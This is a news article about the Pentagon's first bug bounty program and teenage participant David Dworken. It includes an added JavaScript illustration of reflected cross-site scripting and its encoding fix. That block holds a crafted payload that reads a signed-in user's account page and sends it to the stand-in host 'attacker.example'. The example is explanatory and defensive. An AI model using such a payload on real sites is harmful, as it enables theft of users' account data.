Within 13 minutes of urging hackers to take their best shot at the Pentagon’s public websites, the US government’s first-ever bug bounty program had its first submission.
Just six hours later, hackers had already uncovered nearly 200 vulnerabilities in the Department of Defense’s networks.
Already a staple for companies such as Google and Facebook, the bug bounty program – which pays friendly hackers to do the sorts of things that recreational hackers might do for fun, and that criminals like to do for far more nefarious purposes – was so successful that Pentagon officials say that they are considering another bug bounty program for later this year. Other federal agencies, they add, would do well to follow their lead.
The chance to hack the feds drew a wide variety of comers, including David Dworken, 18, who has been a fan of bug bounty programs since middle school. He did it for the T-shirts initially.
“I probably spent about 20 hours on one because I thought they had a really cool T-shirt,” he says. “I thought it was pretty awesome that you could get free T-shirts in the mail.”
Mr. Dworken signed up for an account with HackerOne, a firm that runs bug bounty programs, and gravitated toward companies that offer “Hall of Fame” listings on their websites in lieu of cash for finding bugs.
On the Netflix website, for instance, Dworken found that he could create a URL “that could display and do whatever I wanted. I could send it to you and if you were signed into Netflix, I could steal your account information,” he says. “The fact that software engineers at Netflix are making sure that's fixed is incredibly satisfying.”
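The article does not name the class of bug Dworken found. What he describes, a crafted link that makes a signed-in user's browser run attacker-chosen content, is the classic shape of reflected cross-site scripting (XSS). The block below is an added illustration of that pattern beside its standard fix; it is not Dworken's report or any Netflix code, and the hostnames, handler names and the `/account` endpoint are hypothetical.

```javascript
// Added example, not from the original page: a reflected-XSS pattern of the kind
// Dworken describes, beside the output-encoding fix. All names are hypothetical.

// Vulnerable handler: the search term is copied into the HTML response verbatim,
// so whatever the link carries in ?q= becomes markup in the victim's page.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return `<h1>Results for ${q}</h1>`;
}

// Minimal HTML entity encoding for text placed inside an element body.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: same page, but attacker-controlled text is encoded before
// it is inserted, so it is rendered as text rather than parsed as markup.
function renderSearchHardened(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Stand-in for the browser's parser: would this HTML start executing a script?
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed attacker payload. Because it runs in the site's own origin, the
// fetch carries the victim's session cookies, and the response (the signed-in
// user's account page, in this hypothetical) is shipped to the attacker's host.
const payload =
  "<script>fetch('/account').then(r=>r.text())" +
  ".then(t=>{new Image().src='https://attacker.example/?d='+encodeURIComponent(t)})</script>";

// The link the attacker would send; searchParams.get() decodes it back exactly.
const craftedLink = "https://video.example/search?q=" + encodeURIComponent(payload);

// Returns whether each variant would execute the payload when the link is opened.
function demo() {
  return {
    vulnerableRunsScript: containsScriptTag(renderSearchVulnerable(craftedLink)),
    hardenedRunsScript: containsScriptTag(renderSearchHardened(craftedLink)),
    hardenedOutput: renderSearchHardened(craftedLink),
  };
}

console.log(demo());
```

Encoding the reflected value is the fix for this specific sink (text inside an element); a value placed into an attribute, a URL or a script block needs the encoding appropriate to that context, and a Content Security Policy that disallows inline scripts is the usual second layer.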
As he got more experience, he moved on to companies such as Uber, where he's earned $8,000 finding four bugs, “which is amazing,” Dworken says. “I do this because I think it's the right thing to do, but I really started to get to the point where I made a good chunk of change.”
Then, as he was getting a lift to school with his dad one morning, he heard about a bug bounty on National Public Radio. “We always listen to NPR in the car,” he says. It didn't take long for Dworken to set off on his most intriguing challenge to date: Hacking the Pentagon.
Not long after learning about the program, he received an email from HackerOne, which was running the Pentagon's bug bounty. They wanted him to participate. “I was shocked, and unbelievably excited,” he said.
There was just one snag. His Advanced Placement exams were happening at the same time. So he quickly got to work, reporting “four or five vulnerabilities within the first 12 hours of it opening,” then got back to his studies.
“They were the standard web security vulnerabilities that are on pretty much any website unless they have a really good web security team – or a bug bounty,” he said.
While these sorts of vulnerabilities are “shockingly common overall,” the fact that they existed until recently on DOD websites was striking to Dworken. “Now, it's raised the barrier to hacking into the Pentagon, which is absolutely an amazing thing,” he says. “This may sound cheesy, but it's a way to serve my country from the comfort of my computer.”
Defense officials are counting on this kind of patriotic spirit, and the cachet of getting to hack, well, the Pentagon.
“A lot of hackers, like myself, will choose to help – and not just for the money, but for recognition. This is a historic program,” Katie Moussouris, currently an independent security consultant and former chief policy officer at HackerOne, told reporters in April. “The prestige of being part of the very first program for the US government is also a commodity in and of itself.”
And that saves the Pentagon money – the bug bounty pilot program cost $150,000.
“It’s not a small sum but if we had gone through the normal process of hiring an outside firm to do a security audit and vulnerability assessment, which is what we usually do, it would have cost us over $1 million,” said Defense Secretary Ash Carter.
By comparison, the DOD had paid $5 million over three years to one vendor, which found fewer than 10 vulnerabilities.
These public bug bounty programs do not throw open the Pentagon’s flood gates to let hackers poke around its Secret Internet Protocol Router Network, or SIPRNet, or even the sensitive-but-unclassified Non-Secure Internet Protocol Router Network, or NIPRNet.
Instead, these programs sweep up admittedly low-hanging fruit on public-facing sites, such as a military recreation website that lists where to rent canoes, which offer all too enticing opportunities for “embarrassment through defacement,” as defense officials put it. The Pentagon runs roughly 450 of these websites.
In total, 1,400 eligible ethical hackers – otherwise known as "white hats" – were invited to take part in the program, and more than 250 of them found and submitted at least one vulnerability. Of these, 138 were found to be “legitimate, unique, and eligible for a bounty,” said Secretary Carter.
Equally important, by allowing outside hackers to find holes and vulnerabilities, it frees up the US military's own cyberspecialists “to spend more time fixing them than finding them,” Carter added. “The pilot showed us one way to streamline what we do to defend our networks and correct vulnerabilities more quickly.”
The highest individual bounty was $3,500; the average was $588. The top-earning hacker made $15,000.
Dworken didn't make any actual money, since other bug bounty hackers had already discovered the vulnerabilities he reported (duplicate reports are not paid). But the experience made for good public service and a considerable résumé builder.
He also got a trip to the Pentagon to meet Carter. “I’d never been to the Pentagon, despite living in DC and driving past it 10,000 times.”
This fall, he is headed to Northeastern University in Boston to study computer science, with a focus on cybersecurity. Before that, though, he’s spending a month this summer hiking the Appalachian Trail by himself. During that time, he says, “I’m mostly checking out of technology.”